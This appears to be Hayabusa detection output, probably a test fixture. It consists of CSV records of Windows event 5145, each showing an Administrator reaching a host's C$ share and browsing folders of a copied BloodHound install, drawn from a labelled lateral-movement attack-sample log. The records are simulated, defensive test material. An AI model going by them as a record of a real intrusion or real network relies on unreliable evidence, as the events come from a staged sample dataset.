+2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
